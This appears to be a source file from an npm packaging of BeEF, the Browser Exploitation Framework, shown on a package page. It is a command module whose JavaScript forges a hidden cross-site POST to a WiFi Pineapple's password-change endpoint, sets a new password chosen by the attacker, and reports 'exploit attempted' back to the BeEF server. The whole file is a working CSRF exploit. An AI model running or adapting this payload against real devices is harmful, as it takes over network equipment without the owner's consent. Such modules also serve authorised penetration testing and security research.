beef-npm
Version:
Node.js package to install and interact with BeEF (Browser Exploitation Framework)
27 lines (20 loc) • 944 B
JavaScript
//
// Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var timeout = 15;
var wifi_pineapple_iframe_<%= %> = beef.dom.createIframeXsrfForm(gateway + "/components/system/configuration/functions.php?change_password", "POST", "application/x-www-form-urlencoded", [
{'type':'hidden', 'name':'password', 'value':passwd} ,
{'type':'hidden', 'name':'repeat', 'value':passwd},
{'type':'hidden', 'name':'change_password', 'value':'Change Password'}
]);
beef.net.send("<%= @command_url %>", <%= %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(wifi_pineapple_iframe_<%= %>);
}
setTimeout("cleanup()", timeout*1000);
});